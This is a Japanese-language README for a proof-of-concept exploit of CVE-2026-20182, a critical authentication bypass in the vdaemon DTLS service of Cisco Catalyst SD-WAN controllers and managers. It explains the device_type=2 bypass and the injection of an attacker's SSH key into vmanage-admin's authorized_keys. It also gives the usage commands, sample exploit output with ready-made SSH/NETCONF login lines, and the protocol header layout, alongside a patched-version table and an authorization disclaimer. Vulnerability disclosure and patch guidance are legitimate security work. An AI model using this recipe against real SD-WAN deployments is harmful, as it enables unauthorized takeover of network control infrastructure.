
CVE-2026-20182 PoC - Cisco Catalyst SD-WAN コントローラ / マネージャの認証バイパス (CVSS 10.0)
Cisco Catalyst SD-WAN Controller (vSmart) および Manager (vManage) 上の vdaemon DTLS サービス (UDP/12346) における重大な (CVSS 10.0) 認証バイパスである CVE-2026-20182 の概念実証エクスプロイトです。
公開: 2026年5月14日、Rapid7 (Stephen Fewer & Jonah Burgess) により公開
CISA KEV: 2026年5月14日に追加 (緊急指令26-03)
CVSS: 10.0 — CWE-287: 不適切な認証
vdaemon サービスは、コントロールプレーンのピアを認証するために複数フェーズからなる DTLS ハンドシェイクを使用します。vbond_proc_challenge_ack() 関数はデバイスタイプ固有の証明書検証を実装していますが、デバイスタイプ 2 (vHub) には 検証コードパスがありません。device_type=2 を指定して CHALLENGE_ACK を送信すると、この関数はすべての条件分岐をフォールスルーし、無条件に peer->authenticated = 1 を設定します。
有効な認証情報も、CA 署名付き証明書も、SD-WAN 導入に関する知識も必要ありません。
MSG_VMANAGE_TO_PEER (msg_type=14) を介して SSH 公開鍵を /home/vmanage-admin/.ssh/authorized_keys に注入しますvmanage-admin として NETCONF アクセス (SSH TCP/830) または SSH アクセス (TCP/22) を許可しますpython3 cve-2026-20182.py -t <target> [options]
| 引数 | 説明 |
|---|---|
-t, --target | ターゲットの IP またはホスト名 |
--port | vdaemon UDP ポート (デフォルト: 12346) |
--key-file | 注入する既存の SSH 公開鍵のパス (任意) |
--netconf | SSH 経由で NETCONF に接続してエクスプロイトを検証します |
# Generate a fresh key pair and exploit
python3 cve-2026-20182.py -t 192.168.1.100
# Use an existing public key
python3 cve-2026-20182.py -t 192.168.1.100 --key-file ~/.ssh/id_rsa.pub
# Exploit and verify via NETCONF
python3 cve-2026-20182.py -t 192.168.1.100 --netconf
[*] Targeting 192.168.1.100:12346 (vdaemon DTLS)
[+] DTLS handshake complete (received msg_type=8, 1027 bytes)
[*] Sending CHALLENGE_ACK with device_type=2 (vHub) ...
[+] peer->authenticated = 1 (authentication bypassed!)
[*] Sending HELLO ...
[+] Peer is UP state (peering handshake bypass successful)
[*] Injecting SSH public key ...
[+] NETCONF: ssh -i /tmp/cve-2026-20182_key -o HostKeyAlgorithms=+ssh-rsa -p 830 [email protected]
[+] SSH: ssh -i /tmp/cve-2026-20182_key -o HostKeyAlgorithms=+ssh-rsa [email protected]
| リリース | 修正バージョン |
|---|---|
| < 20.9 | サポート対象のリリースに移行してください |
| 20.9 | 20.9.9.1 |
| 20.10 | 20.12.7.1 |
| 20.11 | 20.12.7.1 |
| 20.12 | 20.12.5.4 / 20.12.6.2 / 20.12.7.1 |
| 20.13 | 20.15.5.2 |
| 20.14 | 20.15.5.2 |
| 20.15 | 20.15.4.4 / 20.15.5.2 |
| 20.16 | 20.18.2.2 |
| 20.18 | 20.18.2.2 |
| 26.1.1 | 26.1.1.1 |
cisco_sdwan_vhub_auth_bypass — Metasploit フレームワークの補助モジュールvdaemon プロトコルヘッダーは 12 バイトです:
| オフセット | サイズ | フィールド | 備考 |
|---|---|---|---|
| 0 | 1 | msg_type | 下位ニブル = タイプ、上位ニブル = バージョン |
| 1 | 1 | device_info | 上位ニブル = デバイスタイプ、下位ニブル = フラグ |
| 2 | 1 | flags | 標準値 0xA0 |
| 3 | 1 | padding | 常に 0x00 |
| 4-7 | 4 | domain_id | ビッグエンディアン uint32 |
| 8-11 | 4 | site_id | ビッグエンディアン uint32 |
デバイスタイプ: 1=vEdge, 2=vHub, 3=vSmart, 4=vBond, 5=vManage
openssl CLI (DTLS トランスポート用)cryptography ライブラリ (pip install cryptography)このエクスプロイトは、明示的な書面による許可を得たシステムに対する、認定されたレッドチーム運用、ペネトレーションテスト、およびセキュリティ研究のみを目的としています。許可のない使用は違法です。